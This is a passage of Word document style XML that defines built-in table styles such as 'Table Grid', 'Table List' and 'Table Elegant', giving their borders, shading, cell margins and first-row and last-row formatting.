      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="pct10" w:color="000000" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="121">
    <w:name w:val="Table Columns 5"/>
    <w:basedOn w:val="106"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="auto"/>
    </w:rPr>
    <w:tblPr>
      <w:tblBorders>
        <w:top w:val="single" w:color="808080" w:sz="12" w:space="0"/>
        <w:left w:val="single" w:color="808080" w:sz="12" w:space="0"/>
        <w:bottom w:val="single" w:color="808080" w:sz="12" w:space="0"/>
        <w:right w:val="single" w:color="808080" w:sz="12" w:space="0"/>
        <w:insideV w:val="single" w:color="C0C0C0" w:sz="6" w:space="0"/>
      </w:tblBorders>
      <w:tblLayout w:type="fixed"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:i/>
        <w:iCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="single" w:color="808080" w:sz="6" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="808080" w:sz="6"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Vert">
      <w:rPr>
        <w:color w:val="auto"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="solid" w:color="C0C0C0" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Vert">
      <w:rPr>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="122">
    <w:name w:val="Table Contemporary"/>
    <w:basedOn w:val="106"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblBorders>
        <w:insideH w:val="single" w:color="FFFFFF" w:sz="18" w:space="0"/>
        <w:insideV w:val="single" w:color="FFFFFF" w:sz="18" w:space="0"/>
      </w:tblBorders>
      <w:tblLayout w:type="fixed"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="auto"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="pct20" w:color="000000" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:rPr>
        <w:color w:val="auto"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="pct5" w:color="000000" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Horz">
      <w:rPr>
        <w:color w:val="auto"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="pct20" w:color="000000" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="123">
    <w:name w:val="Table Elegant"/>
    <w:basedOn w:val="106"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="auto"/>
    </w:rPr>
    <w:tblPr>
      <w:tblBorders>
        <w:top w:val="double" w:color="000000" w:sz="6" w:space="0"/>
        <w:left w:val="double" w:color="000000" w:sz="6" w:space="0"/>
        <w:bottom w:val="double" w:color="000000" w:sz="6" w:space="0"/>
        <w:right w:val="double" w:color="000000" w:sz="6"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caps/>
        <w:color w:val="auto"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="124">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="106"/>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table" w:styleId="125">
    <w:name w:val="Table Grid 1"/>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lastRow">
      <w:rPr>
        <w:i/>
        <w:iCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:i/>
        <w:iCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="nwCell">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="single" w:color="000000" w:sz="6" w:space="0"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:textDirection w:val="lrTb"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="126">
    <w:name w:val="Table Grid 2"/>
    <w:basedOn w:val="106"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="auto"/>
    </w:rPr>
    <w:tblPr>
      <w:tblBorders>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bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>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style>
  <w:style w:type="table" w:styleId="127">
    <w:name w:val="Table Grid 3"/>
    <w:basedOn w:val="106"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="auto"/>
    </w:rPr>
    <w:tblPr>
      <w:tblBorders>
        <w:top w:val="single" w:color="000000" w:sz="6" w:space="0"/>
        <w:left w:val="single" w:color="000000" w:sz="12" w:space="0"/>
        <w:bottom w:val="single" w:color="000000" w:sz="6" w:space="0"/>
        <w:right w:val="single" w:color="000000" w:sz="12" w:space="0"/>
        <w:insideV w:val="single" w:color="000000" w:sz="6" w:space="0"/>
      </w:tblBorders>
      <w:tblLayout w:type="fixed"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tcPr>
      <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
    </w:tcPr>
    <w:tblStylePr w:type="firstRow">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="single" w:color="000000" w:sz="6" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="pct30" w:color="FFFF00" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">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nwCell">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="single" w:color="000000" w:sz="6" w:space="0"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:textDirection w:val="lrTb"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="128">
    <w:name w:val="Table Grid 4"/>
    <w:basedOn w:val="106"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="auto"/>
    </w:rPr>
    <w:tblPr>
      <w:tblBorders>
        <w:left w:val="single" w:color="000000" w:sz="12" w:space="0"/>
        <w:right w:val="single" w:color="000000" w:sz="12"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color w:val="auto"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="single" w:color="000000" w:sz="6" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="pct30" w:color="FFFF00" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="auto"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="000000" w:sz="6" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="pct30" w:color="FFFF00" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="auto"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="129">
    <w:name w:val="Table Grid 5"/>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tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="single" w:color="000000" w:sz="12" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">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nwCell">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="single" w:color="000000" w:sz="6" w:space="0"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="130">
    <w:name w:val="Table Grid 6"/>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bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="single" w:color="000000" w:sz="6" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:color w:val="auto"/>
      </w:rPr>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tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="nwCell">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="single" w:color="000000" w:sz="6" w:space="0"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="131">
    <w:name w:val="Table Grid 7"/>
    <w:basedOn w:val="106"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="auto"/>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val="0"/>
        <w:bCs w:val="0"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="single" w:color="000000" w:sz="12" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="000000" w:sz="6" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b w:val="0"/>
        <w:bCs w:val="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nwCell">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="single" w:color="000000" w:sz="6" w:space="0"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="132">
    <w:name w:val="Table Grid 8"/>
    <w:basedOn w:val="106"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="auto"/>
    </w:rPr>
    <w:tblPr>
      <w:tblBorders>
        <w:top w:val="single" w:color="000080" w:sz="6" w:space="0"/>
        <w:left w:val="single" w:color="000080" w:sz="6" w:space="0"/>
        <w:bottom w:val="single" w:color="000080" w:sz="6" w:space="0"/>
        <w:right w:val="single" w:color="000080" w:sz="6" w:space="0"/>
        <w:insideH w:val="single" w:color="000080" w:sz="6" w:space="0"/>
        <w:insideV w:val="single" w:color="000080" w:sz="6" w:space="0"/>
      </w:tblBorders>
      <w:tblLayout w:type="fixed"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tcPr>
      <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
    </w:tcPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="FFFFFF"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="solid" w:color="000080" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="auto"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="auto"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="133">
    <w:name w:val="Table List 1"/>
    <w:basedOn w:val="106"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblBorders>
        <w:top w:val="single" w:color="008080" w:sz="12" w:space="0"/>
        <w:left w:val="single" w:color="008080" w:sz="6" w:space="0"/>
        <w:bottom w:val="single" w:color="008080" w:sz="12" w:space="0"/>
        <w:right w:val="single" w:color="008080" w:sz="6" w:space="0"/>
      </w:tblBorders>
      <w:tblLayout w:type="fixed"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:i/>
        <w:iCs/>
        <w:color w:val="800000"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="single" w:color="000000" w:sz="6" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="solid" w:color="C0C0C0" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="000000" w:sz="6" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:rPr>
        <w:color w:val="auto"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="solid" w:color="C0C0C0" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Horz">
      <w:rPr>
        <w:color w:val="auto"/>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34">
    <w:name w:val="Table List 2"/>
    <w:basedOn w:val="106"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblBorders>
        <w:bottom w:val="single" w:color="808080" w:sz="12" w:space="0"/>
      </w:tblBorders>
      <w:tblLayout w:type="fixed"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="FFFFFF"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="single" w:color="000000" w:sz="6" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="pct75" w:color="008080" w:fill="008000"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="000000" w:sz="6" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:rPr>
        <w:color w:val="auto"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="pct20" w:color="00FF00" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Horz">
      <w:rPr>
        <w:color w:val="auto"/>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35">
    <w:name w:val="Table List 3"/>
    <w:basedOn w:val="106"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="auto"/>
    </w:rPr>
    <w:tblPr>
      <w:tblBorders>
        <w:top w:val="single" w:color="000000" w:sz="12" w:space="0"/>
        <w:bottom w:val="single" w:color="000000" w:sz="12" w:space="0"/>
        <w:insideH w:val="single" w:color="000000" w:sz="6" w:space="0"/>
      </w:tblBorders>
      <w:tblLayout w:type="fixed"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tcPr>
      <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
    </w:tcPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="000080"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="single" w:color="000000" w:sz="12" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="000000" w:sz="12" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="swCell">
      <w:rPr>
        <w:i/>
        <w:iCs/>
        <w:color w:val="000080"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="136">
    <w:name w:val="Table List 4"/>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insideH w:val="single" w:color="000000" w:sz="6" w:space="0"/>
      </w:tblBorders>
      <w:tblLayout w:type="fixed"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tcPr>
      <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
    </w:tcPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="FFFFFF"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="single" w:color="000000" w:sz="12" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="solid" w:color="808080" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="137">
    <w:name w:val="Table List 5"/>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insideH w:val="single" w:color="000000" w:sz="6" w:space="0"/>
      </w:tblBorders>
      <w:tblLayout w:type="fixed"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tcPr>
      <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
    </w:tcPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="single" w:color="000000" w:sz="12" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="138">
    <w:name w:val="Table List 6"/>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tblBorders>
      <w:tblLayout w:type="fixed"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tcPr>
      <w:shd w:val="pct50" w:color="000000" w:fill="FFFFFF"/>
    </w:tcPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="single" w:color="000000" w:sz="12" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:right w:val="single" w:color="000000" w:sz="12" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="pct25" w:color="000000" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="nwCell">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="single" w:color="000000" w:sz="6" w:space="0"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:textDirection w:val="lrTb"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="139">
    <w:name w:val="Table List 7"/>
    <w:basedOn w:val="106"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblBorders>
        <w:top w:val="single" w:color="008000" w:sz="12" w:space="0"/>
        <w:left w:val="single" w:color="008000" w:sz="6" w:space="0"/>
        <w:bottom w:val="single" w:color="008000" w:sz="12" w:space="0"/>
        <w:right w:val="single" w:color="008000" w:sz="6" w:space="0"/>
        <w:insideH w:val="single" w:color="000000" w:sz="6" w:space="0"/>
      </w:tblBorders>
      <w:tblLayout w:type="fixed"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
